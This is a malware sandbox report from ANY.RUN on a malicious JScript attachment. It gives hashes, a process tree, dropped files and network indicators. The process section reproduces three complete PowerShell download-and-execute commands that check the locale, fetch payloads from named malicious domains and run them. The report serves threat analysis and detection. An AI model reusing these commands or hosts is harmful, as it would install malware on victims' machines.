analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Restructura_Torino_Novembre2019 2019 06050316583311 xm.js

Full analysis: https://app.any.run/tasks/d3bbc84d-6ba8-4c31-a200-eb62c5a089e9
Verdict: Malicious activity
Analysis date: March 21, 2019, 15:13:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

D10081172E8B798A5C1B7F4EB15D26A6

SHA1:

B4105600320925EEBC366F4F44293D114039D827

SHA256:

B27E6BF73D4B1456AC50DAF67CE728C8A1FBC1D07C9BE1D163596DCDEC60C047

SSDEEP:

192:2nbbxRvZ9BswCOCY4pTnDcojaTnfQFFtWJjuZ5YJPitAjTifYP4q:2lsbjjGfstW4Z9MTsYAq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4064)
      • powershell.exe (PID: 3412)
      • powershell.exe (PID: 2220)
    • Executes scripts

      • powershell.exe (PID: 4064)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2712)
      • WScript.exe (PID: 1708)
    • Executes application which crashes

      • powershell.exe (PID: 2220)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 4064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe powershell.exe wscript.exe no specs ntvdm.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2712"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Restructura_Torino_Novembre2019 2019 06050316583311 xm.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4064"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $bvyxv = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?ycyjheadezafitzhwh',$bvyxv); Start-Process $bvyxv;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2220"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $iezwjdihceegvxh = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'Dke.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?fhigcxjwfvehg',$iezwjdihceegvxh); Start-Process $iezwjdihceegvxh;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1708"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2316"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
3221225477
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3412"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $sxtywszfjtzczixzjg = [System.IO.Path]::GetTempPath() + '\SearchI32.txt';$vdbsbvceuvayxftwebhu = ''; ( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php',$sxtywszfjtzczixzjg);;Get-Content $sxtywszfjtzczixzjg | Where-Object {$_ -match $regex} | ForEach-Object { $vdbsbvceuvayxftwebhu += $_ -replace '..(.)','$1'} ;Invoke-Expression -Command $vdbsbvceuvayxftwebhu;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 276
Read events
1 083
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
4064powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZCYSP5HMI8QD991DNUH.temp
MD5:
SHA256:
2220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N3M37PR26CRM42AST27M.temp
MD5:
SHA256:
3412powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSP281VN7APUUQ0ZL3M1.temp
MD5:
SHA256:
4064powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFffbfa.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFffc0a.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3412powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100419.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2220powershell.exeC:\Users\admin\AppData\Local\Dke.exetext
MD5:905F2BB7E8852FB96CB9AEFF9568A839
SHA256:792376C209F338959BE4CF00C54DBF82662B90516082E23106FAEC4C43C69E49
3412powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
4064powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2220
powershell.exe
GET
200
31.214.157.69:80
http://cloud.kokoheadattorney.com/501?fhigcxjwfvehg
NL
text
4 b
malicious
4064
powershell.exe
GET
200
31.214.157.69:80
http://cloud.kokoheadattorney.com/502?ycyjheadezafitzhwh
NL
text
9.77 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3412
powershell.exe
185.158.250.114:80
cdn.zaczvk.pl
M247 Ltd
NL
malicious
4064
powershell.exe
31.214.157.69:80
cloud.kokoheadattorney.com
easystores GmbH
NL
suspicious
2220
powershell.exe
31.214.157.69:80
cloud.kokoheadattorney.com
easystores GmbH
NL
suspicious

DNS requests

Domain
IP
Reputation
cloud.kokoheadattorney.com
  • 31.214.157.69
malicious
cdn.zaczvk.pl
  • 185.158.250.114
unknown

Threats

No threats detected
No debug info